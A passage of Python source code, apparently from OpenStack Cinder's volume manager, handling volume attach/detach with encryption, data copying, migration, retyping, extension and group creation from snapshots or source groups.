utils.brick_attach_volume_encryptor(ctxt,
attach_info,
encryption)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed to attach volume encryptor"
" %(vol)s."), {'vol': volume['id']})
self._detach_volume(ctxt, attach_info, volume, properties)
return attach_info
def _detach_volume(self, ctxt, attach_info, volume, properties,
force=False, remote=False,
attach_encryptor=False):
connector = attach_info['connector']
if attach_encryptor and (
volume_types.is_encrypted(ctxt,
volume.volume_type_id)):
encryption = self.db.volume_encryption_metadata_get(
ctxt.elevated(), volume.id)
if encryption:
utils.brick_detach_volume_encryptor(attach_info, encryption)
connector.disconnect_volume(attach_info['conn']['data'],
attach_info['device'])
if remote:
rpcapi = volume_rpcapi.VolumeAPI()
rpcapi.terminate_connection(ctxt, volume, properties, force=force)
rpcapi.remove_export(ctxt, volume)
else:
try:
self.terminate_connection(ctxt, volume['id'], properties,
force=force)
self.remove_export(ctxt, volume['id'])
except Exception as err:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Unable to terminate volume connection: '
'%(err)s.') % {'err': err})
def _copy_volume_data(self, ctxt, src_vol, dest_vol, remote=None):
"""Copy data from src_vol to dest_vol."""
LOG.debug('copy_data_between_volumes %(src)s -> %(dest)s.',
{'src': src_vol['name'], 'dest': dest_vol['name']})
attach_encryptor = False
# If the encryption method or key is changed, we have to
# copy data through dm-crypt.
if volume_types.volume_types_encryption_changed(
ctxt,
src_vol.volume_type_id,
dest_vol.volume_type_id):
attach_encryptor = True
properties = utils.brick_get_connector_properties()
dest_remote = remote in ['dest', 'both']
dest_attach_info = self._attach_volume(
ctxt, dest_vol, properties,
remote=dest_remote,
attach_encryptor=attach_encryptor)
try:
src_remote = remote in ['src', 'both']
src_attach_info = self._attach_volume(
ctxt, src_vol, properties,
remote=src_remote,
attach_encryptor=attach_encryptor)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed to attach source volume for copy."))
self._detach_volume(ctxt, dest_attach_info, dest_vol,
properties, remote=dest_remote,
attach_encryptor=attach_encryptor)
# Check the backend capabilities of migration destination host.
rpcapi = volume_rpcapi.VolumeAPI()
capabilities = rpcapi.get_capabilities(ctxt,
dest_vol.service_topic_queue,
False)
sparse_copy_volume = bool(capabilities and
capabilities.get('sparse_copy_volume',
False))
copy_error = True
try:
size_in_mb = int(src_vol['size']) * units.Ki # vol size is in GB
vol_utils.copy_volume(src_attach_info['device']['path'],
dest_attach_info['device']['path'],
size_in_mb,
self.configuration.volume_dd_blocksize,
sparse=sparse_copy_volume)
copy_error = False
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Failed to copy volume %(src)s to %(dest)s."),
{'src': src_vol['id'], 'dest': dest_vol['id']})
finally:
try:
self._detach_volume(ctxt, dest_attach_info, dest_vol,
properties, force=copy_error,
remote=dest_remote,
attach_encryptor=attach_encryptor)
finally:
self._detach_volume(ctxt, src_attach_info, src_vol,
properties, force=copy_error,
remote=src_remote,
attach_encryptor=attach_encryptor)
def _migrate_volume_generic(self, ctxt, volume, backend, new_type_id):
rpcapi = volume_rpcapi.VolumeAPI()
# Create new volume on remote host
tmp_skip = {'snapshot_id', 'source_volid'}
skip = self._VOLUME_CLONE_SKIP_PROPERTIES | tmp_skip | {'host',
'cluster_name'}
new_vol_values = {k: volume[k] for k in set(volume.keys()) - skip}
if new_type_id:
new_vol_values['volume_type_id'] = new_type_id
if volume_types.volume_types_encryption_changed(
ctxt, volume.volume_type_id, new_type_id):
encryption_key_id = vol_utils.create_encryption_key(
ctxt, self.key_manager, new_type_id)
new_vol_values['encryption_key_id'] = encryption_key_id
new_volume = objects.Volume(
context=ctxt,
host=backend['host'],
cluster_name=backend.get('cluster_name'),
status='creating',
attach_status=fields.VolumeAttachStatus.DETACHED,
migration_status='target:%s' % volume['id'],
**new_vol_values
)
new_volume.create()
rpcapi.create_volume(ctxt, new_volume, None, None,
allow_reschedule=False)
# Wait for new_volume to become ready
starttime = time.time()
deadline = starttime + CONF.migration_create_volume_timeout_secs
# TODO(thangp): Replace get_by_id with refresh when it is available
new_volume = objects.Volume.get_by_id(ctxt, new_volume.id)
tries = 0
while new_volume.status != 'available':
tries += 1
now = time.time()
if new_volume.status == 'error':
msg = _("failed to create new_volume on destination")
self._clean_temporary_volume(ctxt, volume,
new_volume,
clean_db_only=True)
raise exception.VolumeMigrationFailed(reason=msg)
elif now > deadline:
msg = _("timeout creating new_volume on destination")
self._clean_temporary_volume(ctxt, volume,
new_volume,
clean_db_only=True)
raise exception.VolumeMigrationFailed(reason=msg)
else:
time.sleep(tries ** 2)
# TODO(thangp): Replace get_by_id with refresh when it is
# available
new_volume = objects.Volume.get_by_id(ctxt, new_volume.id)
# Set skipped value to avoid calling
# function except for _create_raw_volume
tmp_skipped_values = {k: volume[k] for k in tmp_skip if volume.get(k)}
if tmp_skipped_values:
new_volume.update(tmp_skipped_values)
new_volume.save()
# Copy the source volume to the destination volume
try:
attachments = volume.volume_attachment
if not attachments:
# Pre- and post-copy driver-specific actions
self.driver.before_volume_copy(ctxt, volume, new_volume,
remote='dest')
self._copy_volume_data(ctxt, volume, new_volume, remote='dest')
self.driver.after_volume_copy(ctxt, volume, new_volume,
remote='dest')
# The above call is synchronous so we complete the migration
self.migrate_volume_completion(ctxt, volume, new_volume,
error=False)
else:
nova_api = compute.API()
# This is an async call to Nova, which will call the completion
# when it's done
for attachment in attachments:
instance_uuid = attachment['instance_uuid']
nova_api.update_server_volume(ctxt, instance_uuid,
volume.id,
new_volume.id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE(
"Failed to copy volume %(vol1)s to %(vol2)s"), {
'vol1': volume.id, 'vol2': new_volume.id})
self._clean_temporary_volume(ctxt, volume,
new_volume)
def _clean_temporary_volume(self, ctxt, volume, new_volume,
clean_db_only=False):
# If we're in the migrating phase, we need to cleanup
# destination volume because source volume is remaining
if volume.migration_status == 'migrating':
try:
if clean_db_only:
# The temporary volume is not created, only DB data
# is created
new_volume.destroy()
else:
# The temporary volume is already created
rpcapi = volume_rpcapi.VolumeAPI()
rpcapi.delete_volume(ctxt, new_volume)
except exception.VolumeNotFound:
LOG.info(_LI("Couldn't find the temporary volume "
"%(vol)s in the database. There is no need "
"to clean up this volume."),
{'vol': new_volume.id})
else:
# If we're in the completing phase don't delete the
# destination because we may have already deleted the
# source! But the migration_status in database should
# be cleared to handle volume after migration failure
try:
new_volume.migration_status = None
new_volume.save()
except exception.VolumeNotFound:
LOG.info(_LI("Couldn't find destination volume "
"%(vol)s in the database. The entry might be "
"successfully deleted during migration "
"completion phase."),
{'vol': new_volume.id})
LOG.warning(_LW("Failed to migrate volume. The destination "
"volume %(vol)s is not deleted since the "
"source volume may have been deleted."),
{'vol': new_volume.id})
def migrate_volume_completion(self, ctxt, volume, new_volume, error=False):
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the migration status updated.
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
volume.migration_status = 'error'
volume.save()
LOG.debug("migrate_volume_completion: completing migration for "
"volume %(vol1)s (temporary volume %(vol2)s",
{'vol1': volume.id, 'vol2': new_volume.id})
rpcapi = volume_rpcapi.VolumeAPI()
orig_volume_status = volume.previous_status
if error:
LOG.info(_LI("migrate_volume_completion is cleaning up an error "
"for volume %(vol1)s (temporary volume %(vol2)s"),
{'vol1': volume['id'], 'vol2': new_volume.id})
rpcapi.delete_volume(ctxt, new_volume)
updates = {'migration_status': 'error',
'status': orig_volume_status}
volume.update(updates)
volume.save()
return volume.id
volume.migration_status = 'completing'
volume.save()
# Detach the source volume (if it fails, don't fail the migration)
# As after detach and refresh, volume_attchments will be None.
# We keep volume_attachment for later attach.
volume_attachments = []
if orig_volume_status == 'in-use':
for attachment in volume.volume_attachment:
# Save the attachments the volume currently have
volume_attachments.append(attachment)
try:
self.detach_volume(ctxt, volume.id, attachment.id)
except Exception as ex:
LOG.error(_LE("Detach migration source volume "
"%(volume.id)s from instance "
"%(instance_id)s failed: %(err)s"),
{'err': ex,
'volume.id': volume.id,
'instance_id': attachment.id},
resource=volume)
# Give driver (new_volume) a chance to update things as needed
# after a successful migration.
# Note this needs to go through rpc to the host of the new volume
# the current host and driver object is for the "existing" volume.
rpcapi.update_migrated_volume(ctxt, volume, new_volume,
orig_volume_status)
volume.refresh()
new_volume.refresh()
# Swap src and dest DB records so we can continue using the src id and
# asynchronously delete the destination id
updated_new = volume.finish_volume_migration(new_volume)
updates = {'status': orig_volume_status,
'previous_status': volume.status,
'migration_status': 'success'}
# Restore the attachmens
if orig_volume_status == 'in-use':
for attachment in volume_attachments:
LOG.debug('Re-attaching: %s', attachment)
rpcapi.attach_volume(ctxt, volume,
attachment.instance_uuid,
attachment.attached_host,
attachment.mountpoint,
'rw')
volume.update(updates)
volume.save()
# Asynchronous deletion of the source volume in the back-end (now
# pointed by the target volume id)
try:
rpcapi.delete_volume(ctxt, updated_new)
except Exception as ex:
LOG.error(_LE('Failed to request async delete of migration source '
'vol %(vol)s: %(err)s'),
{'vol': volume.id, 'err': ex})
LOG.info(_LI("Complete-Migrate volume completed successfully."),
resource=volume)
return volume.id
def migrate_volume(self, ctxt, volume, host, force_host_copy=False,
new_type_id=None):
"""Migrate the volume to the specified host (called on source host)."""
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the migration status updated.
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
volume.migration_status = 'error'
volume.save()
model_update = None
moved = False
status_update = None
if volume.status in ('retyping', 'maintenance'):
status_update = {'status': volume.previous_status}
volume.migration_status = 'migrating'
volume.save()
if not force_host_copy and new_type_id is None:
try:
LOG.debug("Issue driver.migrate_volume.", resource=volume)
moved, model_update = self.driver.migrate_volume(ctxt,
volume,
host)
if moved:
updates = {'host': host['host'],
'cluster_name': host.get('cluster_name'),
'migration_status': 'success',
'previous_status': volume.status}
if status_update:
updates.update(status_update)
if model_update:
updates.update(model_update)
volume.update(updates)
volume.save()
except Exception:
with excutils.save_and_reraise_exception():
updates = {'migration_status': 'error'}
if status_update:
updates.update(status_update)
volume.update(updates)
volume.save()
if not moved:
try:
self._migrate_volume_generic(ctxt, volume, host, new_type_id)
except Exception:
with excutils.save_and_reraise_exception():
updates = {'migration_status': 'error'}
if status_update:
updates.update(status_update)
volume.update(updates)
volume.save()
LOG.info(_LI("Migrate volume completed successfully."),
resource=volume)
@periodic_task.periodic_task
def _report_driver_status(self, context):
if not self.driver.initialized:
if self.driver.configuration.config_group is None:
config_group = ''
else:
config_group = ('(config name %s)' %
self.driver.configuration.config_group)
LOG.warning(_LW("Update driver status failed: %(config_group)s "
"is uninitialized."),
{'config_group': config_group},
resource={'type': 'driver',
'id': self.driver.__class__.__name__})
else:
volume_stats = self.driver.get_volume_stats(refresh=True)
if self.extra_capabilities:
volume_stats.update(self.extra_capabilities)
if volume_stats:
# Append volume stats with 'allocated_capacity_gb'
self._append_volume_stats(volume_stats)
# Append filter and goodness function if needed
volume_stats = (
self._append_filter_goodness_functions(volume_stats))
# queue it to be sent to the Schedulers.
self.update_service_capabilities(volume_stats)
def _append_volume_stats(self, vol_stats):
pools = vol_stats.get('pools', None)
if pools and isinstance(pools, list):
for pool in pools:
pool_name = pool['pool_name']
try:
pool_stats = self.stats['pools'][pool_name]
except KeyError:
# Pool not found in volume manager
pool_stats = dict(allocated_capacity_gb=0)
pool.update(pool_stats)
def _append_filter_goodness_functions(self, volume_stats):
"""Returns volume_stats updated as needed."""
# Append filter_function if needed
if 'filter_function' not in volume_stats:
volume_stats['filter_function'] = (
self.driver.get_filter_function())
# Append goodness_function if needed
if 'goodness_function' not in volume_stats:
volume_stats['goodness_function'] = (
self.driver.get_goodness_function())
return volume_stats
def publish_service_capabilities(self, context):
"""Collect driver status and then publish."""
self._report_driver_status(context)
self._publish_service_capabilities(context)
def _notify_about_volume_usage(self,
context,
volume,
event_suffix,
extra_usage_info=None):
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_snapshot_usage(self,
context,
snapshot,
event_suffix,
extra_usage_info=None):
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_consistencygroup_usage(self,
context,
group,
event_suffix,
volumes=None,
extra_usage_info=None):
vol_utils.notify_about_consistencygroup_usage(
context, group, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not volumes:
volumes = self.db.volume_get_all_by_group(context, group.id)
if volumes:
for volume in volumes:
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_group_usage(self,
context,
group,
event_suffix,
volumes=None,
extra_usage_info=None):
vol_utils.notify_about_group_usage(
context, group, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not volumes:
volumes = self.db.volume_get_all_by_generic_group(
context, group.id)
if volumes:
for volume in volumes:
vol_utils.notify_about_volume_usage(
context, volume, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_cgsnapshot_usage(self,
context,
cgsnapshot,
event_suffix,
snapshots=None,
extra_usage_info=None):
vol_utils.notify_about_cgsnapshot_usage(
context, cgsnapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not snapshots:
snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
context, cgsnapshot.id)
if snapshots:
for snapshot in snapshots:
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def _notify_about_group_snapshot_usage(self,
context,
group_snapshot,
event_suffix,
snapshots=None,
extra_usage_info=None):
vol_utils.notify_about_group_snapshot_usage(
context, group_snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
if not snapshots:
snapshots = objects.SnapshotList.get_all_for_group_snapshot(
context, group_snapshot.id)
if snapshots:
for snapshot in snapshots:
vol_utils.notify_about_snapshot_usage(
context, snapshot, event_suffix,
extra_usage_info=extra_usage_info, host=self.host)
def extend_volume(self, context, volume, new_size, reservations):
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
volume.status = 'error_extending'
volume.save()
project_id = volume.project_id
size_increase = (int(new_size)) - volume.size
self._notify_about_volume_usage(context, volume, "resize.start")
try:
self.driver.extend_volume(volume, new_size)
except Exception:
LOG.exception(_LE("Extend volume failed."),
resource=volume)
try:
self.db.volume_update(context, volume.id,
{'status': 'error_extending'})
raise exception.CinderException(_("Volume %s: Error trying "
"to extend volume") %
volume.id)
finally:
QUOTAS.rollback(context, reservations, project_id=project_id)
return
QUOTAS.commit(context, reservations, project_id=project_id)
volume.update({'size': int(new_size), 'status': 'available'})
volume.save()
pool = vol_utils.extract_host(volume.host, 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
volume.host, 'pool', True)
try:
self.stats['pools'][pool]['allocated_capacity_gb'] += size_increase
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=size_increase)
self._notify_about_volume_usage(
context, volume, "resize.end",
extra_usage_info={'size': int(new_size)})
LOG.info(_LI("Extend volume completed successfully."),
resource=volume)
def _is_our_backend(self, host, cluster_name):
return ((not cluster_name and
vol_utils.hosts_are_equivalent(self.driver.host, host)) or
(cluster_name and
vol_utils.hosts_are_equivalent(self.driver.cluster_name,
cluster_name)))
def retype(self, context, volume, new_type_id, host,
migration_policy='never', reservations=None,
old_reservations=None):
def _retype_error(context, volume, old_reservations,
new_reservations, status_update):
try:
volume.update(status_update)
volume.save()
finally:
QUOTAS.rollback(context, old_reservations)
QUOTAS.rollback(context, new_reservations)
status_update = {'status': volume.previous_status}
if context.project_id != volume.project_id:
project_id = volume.project_id
else:
project_id = context.project_id
try:
# NOTE(flaper87): Verify the driver is enabled
# before going forward. The exception will be caught
# and the volume status updated.
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
# NOTE(flaper87): Other exceptions in this method don't
# set the volume status to error. Should that be done
# here? Setting the volume back to it's original status
# for now.
volume.update(status_update)
volume.save()
# If old_reservations has been passed in from the API, we should
# skip quotas.
# TODO(ntpttr): These reservation checks are left in to be backwards
# compatible with Liberty and can be removed in N.
if not old_reservations:
# Get old reservations
try:
reserve_opts = {'volumes': -1, 'gigabytes': -volume.size}
QUOTAS.add_volume_type_opts(context,
reserve_opts,
volume.volume_type_id)
# NOTE(wanghao): We don't need to reserve volumes and gigabytes
# quota for retyping operation since they didn't changed, just
# reserve volume_type and type gigabytes is fine.
reserve_opts.pop('volumes')
reserve_opts.pop('gigabytes')
old_reservations = QUOTAS.reserve(context,
project_id=project_id,
**reserve_opts)
except Exception:
volume.update(status_update)
volume.save()
msg = _("Failed to update quota usage while retyping volume.")
LOG.exception(msg, resource=volume)
raise exception.CinderException(msg)
# We already got the new reservations
new_reservations = reservations
# If volume types have the same contents, no need to do anything.
# Use the admin contex to be able to access volume extra_specs
retyped = False
diff, all_equal = volume_types.volume_types_diff(
context.elevated(), volume.volume_type_id, new_type_id)
if all_equal:
retyped = True
# Call driver to try and change the type
retype_model_update = None
# NOTE(jdg): Check to see if the destination host or cluster (depending
# if it's the volume is in a clustered backend or not) is the same as
# the current. If it's not don't call the driver.retype method,
# otherwise drivers that implement retype may report success, but it's
# invalid in the case of a migrate.
# We assume that those that support pools do this internally
# so we strip off the pools designation
if (not retyped and
not diff.get('encryption') and
self._is_our_backend(host['host'], host.get('cluster_name'))):
try:
new_type = volume_types.get_volume_type(context.elevated(),
new_type_id)
with volume.obj_as_admin():
ret = self.driver.retype(context,
volume,
new_type,
diff,
host)
# Check if the driver retype provided a model update or
# just a retype indication
if type(ret) == tuple:
retyped, retype_model_update = ret
else:
retyped = ret
if retyped:
LOG.info(_LI("Volume %s: retyped successfully"), volume.id)
except Exception:
retyped = False
LOG.exception(_LE("Volume %s: driver error when trying to "
"retype, falling back to generic "
"mechanism."), volume.id)
# We could not change the type, so we need to migrate the volume, where
# the destination volume will be of the new type
if not retyped:
if migration_policy == 'never':
_retype_error(context, volume, old_reservations,
new_reservations, status_update)
msg = _("Retype requires migration but is not allowed.")
raise exception.VolumeMigrationFailed(reason=msg)
snaps = objects.SnapshotList.get_all_for_volume(context,
volume.id)
if snaps:
_retype_error(context, volume, old_reservations,
new_reservations, status_update)
msg = _("Volume must not have snapshots.")
LOG.error(msg)
raise exception.InvalidVolume(reason=msg)
# Don't allow volume with replicas to be migrated
rep_status = volume.replication_status
if rep_status is not None and rep_status != 'disabled':
_retype_error(context, volume, old_reservations,
new_reservations, status_update)
msg = _("Volume must not be replicated.")
LOG.error(msg)
raise exception.InvalidVolume(reason=msg)
volume.migration_status = 'starting'
volume.save()
try:
self.migrate_volume(context, volume, host,
new_type_id=new_type_id)
except Exception:
with excutils.save_and_reraise_exception():
_retype_error(context, volume, old_reservations,
new_reservations, status_update)
else:
model_update = {'volume_type_id': new_type_id,
'host': host['host'],
'cluster_name': host.get('cluster_name'),
'status': status_update['status']}
if retype_model_update:
model_update.update(retype_model_update)
self._set_replication_status(diff, model_update)
volume.update(model_update)
volume.save()
if old_reservations:
QUOTAS.commit(context, old_reservations, project_id=project_id)
if new_reservations:
QUOTAS.commit(context, new_reservations, project_id=project_id)
self._notify_about_volume_usage(
context, volume, "retype",
extra_usage_info={'volume_type': new_type_id})
self.publish_service_capabilities(context)
LOG.info(_LI("Retype volume completed successfully."),
resource=volume)
@staticmethod
def _set_replication_status(diff, model_update):
"""Update replication_status in model_update if it has changed."""
if not diff or model_update.get('replication_status'):
return
diff_specs = diff.get('extra_specs', {})
replication_diff = diff_specs.get('replication_enabled')
if replication_diff:
is_replicated = vol_utils.is_replicated_str(replication_diff[1])
if is_replicated:
replication_status = fields.ReplicationStatus.ENABLED
else:
replication_status = fields.ReplicationStatus.DISABLED
model_update['replication_status'] = replication_status
def manage_existing(self, ctxt, volume, ref=None):
vol_ref = self._run_manage_existing_flow_engine(
ctxt, volume, ref)
self._update_stats_for_managed(vol_ref)
LOG.info(_LI("Manage existing volume completed successfully."),
resource=vol_ref)
return vol_ref.id
def _update_stats_for_managed(self, volume_reference):
# Update volume stats
pool = vol_utils.extract_host(volume_reference.host, 'pool')
if pool is None:
# Legacy volume, put them into default pool
pool = self.driver.configuration.safe_get(
'volume_backend_name') or vol_utils.extract_host(
volume_reference.host, 'pool', True)
try:
self.stats['pools'][pool]['allocated_capacity_gb'] \
+= volume_reference.size
except KeyError:
self.stats['pools'][pool] = dict(
allocated_capacity_gb=volume_reference.size)
def _run_manage_existing_flow_engine(self, ctxt, volume, ref):
try:
flow_engine = manage_existing.get_flow(
ctxt,
self.db,
self.driver,
self.host,
volume,
ref,
)
except Exception:
msg = _("Failed to create manage_existing flow.")
LOG.exception(msg, resource={'type': 'volume', 'id': volume.id})
raise exception.CinderException(msg)
with flow_utils.DynamicLogListener(flow_engine, logger=LOG):
flow_engine.run()
# Fetch created volume from storage
vol_ref = flow_engine.storage.fetch('volume')
return vol_ref
def _get_my_resources(self, ctxt, ovo_class_list):
if self.cluster:
filters = {'cluster_name': self.cluster}
else:
filters = {'host': self.host}
return getattr(ovo_class_list, 'get_all')(ctxt, filters=filters)
def _get_my_volumes(self, ctxt):
return self._get_my_resources(ctxt, objects.VolumeList)
def _get_my_snapshots(self, ctxt):
return self._get_my_resources(ctxt, objects.SnapshotList)
def get_manageable_volumes(self, ctxt, marker, limit, offset, sort_keys,
sort_dirs, want_objects=False):
try:
utils.require_driver_initialized(self.driver)
except exception.DriverNotInitialized:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable volumes failed, due "
"to uninitialized driver."))
cinder_volumes = self._get_my_volumes(ctxt)
try:
driver_entries = self.driver.get_manageable_volumes(
cinder_volumes, marker, limit, offset, sort_keys, sort_dirs)
if want_objects:
driver_entries = (objects.ManageableVolumeList.
from_primitives(ctxt, driver_entries))
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Listing manageable volumes failed, due "
"to driver error."))
return driver_entries
def create_consistencygroup(self, context, group):
"""Creates the consistency group."""
return self._create_group(context, group, False)
def create_group(self, context, group):
"""Creates the group."""
return self._create_group(context, group)
def _create_group(self, context, group, is_generic_group=True):
context = context.elevated()
# Make sure the host in the DB matches our own when clustered
self._set_resource_host(group)
status = fields.GroupStatus.AVAILABLE
model_update = None
if is_generic_group:
self._notify_about_group_usage(
context, group, "create.start")
else:
self._notify_about_consistencygroup_usage(
context, group, "create.start")
try:
utils.require_driver_initialized(self.driver)
LOG.info(_LI("Group %s: creating"), group.name)
if is_generic_group:
try:
model_update = self.driver.create_group(context,
group)
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group.group_type_id != cgsnap_type['id']:
model_update = self._create_group_generic(context,
group)
else:
cg, __ = self._convert_group_to_cg(group, [])
model_update = self.driver.create_consistencygroup(
context, cg)
else:
model_update = self.driver.create_consistencygroup(context,
group)
if model_update:
if (model_update['status'] ==
fields.GroupStatus.ERROR):
msg = (_('Create group failed.'))
LOG.error(msg,
resource={'type': 'group',
'id': group.id})
raise exception.VolumeDriverException(message=msg)
else:
group.update(model_update)
group.save()
except Exception:
with excutils.save_and_reraise_exception():
group.status = fields.GroupStatus.ERROR
group.save()
LOG.error(_LE("Group %s: create failed"),
group.name)
group.status = status
group.created_at = timeutils.utcnow()
group.save()
LOG.info(_LI("Group %s: created successfully"),
group.name)
if is_generic_group:
self._notify_about_group_usage(
context, group, "create.end")
else:
self._notify_about_consistencygroup_usage(
context, group, "create.end")
LOG.info(_LI("Create group completed successfully."),
resource={'type': 'group',
'id': group.id})
return group
def create_consistencygroup_from_src(self, context, group,
cgsnapshot=None, source_cg=None):
"""Creates the consistency group from source.
The source can be a CG snapshot or a source CG.
"""
source_name = None
snapshots = None
source_vols = None
try:
volumes = self.db.volume_get_all_by_group(context, group.id)
if cgsnapshot:
try:
# Check if cgsnapshot still exists
cgsnapshot = objects.CGSnapshot.get_by_id(
context, cgsnapshot.id)
except exception.CgSnapshotNotFound:
LOG.error(_LE("Create consistency group "
"from snapshot-%(snap)s failed: "
"SnapshotNotFound."),
{'snap': cgsnapshot.id},
resource={'type': 'consistency_group',
'id': group.id})
raise
source_name = _("snapshot-%s") % cgsnapshot.id
snapshots = objects.SnapshotList.get_all_for_cgsnapshot(
context, cgsnapshot.id)
for snap in snapshots:
if (snap.status not in
VALID_CREATE_CG_SRC_SNAP_STATUS):
msg = (_("Cannot create consistency group "
"%(group)s because snapshot %(snap)s is "
"not in a valid state. Valid states are: "
"%(valid)s.") %
{'group': group.id,
'snap': snap['id'],
'valid': VALID_CREATE_CG_SRC_SNAP_STATUS})
raise exception.InvalidConsistencyGroup(reason=msg)
if source_cg:
try:
source_cg = objects.ConsistencyGroup.get_by_id(
context, source_cg.id)
except exception.ConsistencyGroupNotFound:
LOG.error(_LE("Create consistency group "
"from source cg-%(cg)s failed: "
"ConsistencyGroupNotFound."),
{'cg': source_cg.id},
resource={'type': 'consistency_group',
'id': group.id})
raise
source_name = _("cg-%s") % source_cg.id
source_vols = self.db.volume_get_all_by_group(
context, source_cg.id)
for source_vol in source_vols:
if (source_vol['status'] not in
VALID_CREATE_CG_SRC_CG_STATUS):
msg = (_("Cannot create consistency group "
"%(group)s because source volume "
"%(source_vol)s is not in a valid "
"state. Valid states are: "
"%(valid)s.") %
{'group': group.id,
'source_vol': source_vol['id'],
'valid': VALID_CREATE_CG_SRC_CG_STATUS})
raise exception.InvalidConsistencyGroup(reason=msg)
# Sort source snapshots so that they are in the same order as their
# corresponding target volumes.
sorted_snapshots = None
if cgsnapshot and snapshots:
sorted_snapshots = self._sort_snapshots(volumes, snapshots)
# Sort source volumes so that they are in the same order as their
# corresponding target volumes.
sorted_source_vols = None
if source_cg and source_vols:
sorted_source_vols = self._sort_source_vols(volumes,
source_vols)
self._notify_about_consistencygroup_usage(
context, group, "create.start")
utils.require_driver_initialized(self.driver)
model_update, volumes_model_update = (
self.driver.create_consistencygroup_from_src(
context, group, volumes, cgsnapshot,
sorted_snapshots, source_cg, sorted_source_vols))
if volumes_model_update:
for update in volumes_model_update:
self.db.volume_update(context, update['id'], update)
if model_update:
group.update(model_update)
group.save()
except Exception:
with excutils.save_and_reraise_exception():
group.status = 'error'
group.save()
LOG.error(_LE("Create consistency group "
"from source %(source)s failed."),
{'source': source_name},
resource={'type': 'consistency_group',
'id': group.id})
# Update volume status to 'error' as well.
for vol in volumes:
self.db.volume_update(
context, vol['id'], {'status': 'error'})
now = timeutils.utcnow()
status = 'available'
for vol in volumes:
update = {'status': status, 'created_at': now}
self._update_volume_from_src(context, vol, update, group=group)
self._update_allocated_capacity(vol)
group.status = status
group.created_at = now
group.save()
self._notify_about_consistencygroup_usage(
context, group, "create.end")
LOG.info(_LI("Create consistency group "
"from source-%(source)s completed successfully."),
{'source': source_name},
resource={'type': 'consistency_group',
'id': group.id})
return group
def create_group_from_src(self, context, group,
group_snapshot=None, source_group=None):
"""Creates the group from source.
The source can be a group snapshot or a source group.
"""
source_name = None
snapshots = None
source_vols = None
try:
volumes = objects.VolumeList.get_all_by_generic_group(context,
group.id)
if group_snapshot:
try:
# Check if group_snapshot still exists
group_snapshot = objects.GroupSnapshot.get_by_id(
context, group_snapshot.id)
except exception.GroupSnapshotNotFound:
LOG.error(_LE("Create group "
"from snapshot-%(snap)s failed: "
"SnapshotNotFound."),
{'snap': group_snapshot.id},
resource={'type': 'group',
'id': group.id})
raise
source_name = _("snapshot-%s") % group_snapshot.id
snapshots = objects.SnapshotList.get_all_for_group_snapshot(
context, group_snapshot.id)
for snap in snapshots:
if (snap.status not in
VALID_CREATE_GROUP_SRC_SNAP_STATUS):
msg = (_("Cannot create group "
"%(group)s because snapshot %(snap)s is "
"not in a valid state. Valid states are: "
"%(valid)s.") %
{'group': group.id,
'snap': snap['id'],
'valid': VALID_CREATE_GROUP_SRC_SNAP_STATUS})
raise exception.InvalidGroup(reason=msg)
if source_group:
try:
source_group = objects.Group.get_by_id(
context, source_group.id)
except exception.GroupNotFound:
LOG.error(_LE("Create group "
"from source group-%(group)s failed: "
"GroupNotFound."),
{'group': source_group.id},
resource={'type': 'group',
'id': group.id})
raise
source_name = _("group-%s") % source_group.id
source_vols = objects.VolumeList.get_all_by_generic_group(
context, source_group.id)
for source_vol in source_vols:
if (source_vol.status not in
VALID_CREATE_GROUP_SRC_GROUP_STATUS):
msg = (_("Cannot create group "
"%(group)s because source volume "
"%(source_vol)s is not in a valid "
"state. Valid states are: "
"%(valid)s.") %
{'group': group.id,
'source_vol': source_vol.id,
'valid': VALID_CREATE_GROUP_SRC_GROUP_STATUS})
raise exception.InvalidGroup(reason=msg)
# Sort source snapshots so that they are in the same order as their
# corresponding target volumes.
sorted_snapshots = None
if group_snapshot and snapshots:
sorted_snapshots = self._sort_snapshots(volumes, snapshots)
# Sort source volumes so that they are in the same order as their
# corresponding target volumes.
sorted_source_vols = None
if source_group and source_vols:
sorted_source_vols = self._sort_source_vols(volumes,
source_vols)
self._notify_about_group_usage(
context, group, "create.start")
utils.require_driver_initialized(self.driver)
try:
model_update, volumes_model_update = (
self.driver.create_group_from_src(
context, group, volumes, group_snapshot,
sorted_snapshots, source_group, sorted_source_vols))
except NotImplementedError:
cgsnap_type = group_types.get_default_cgsnapshot_type()
if group.group_type_id != cgsnap_type['id']:
model_update, volumes_model_update = (
self._create_group_from_src_generic(
context, group, volumes, group_snapshot,
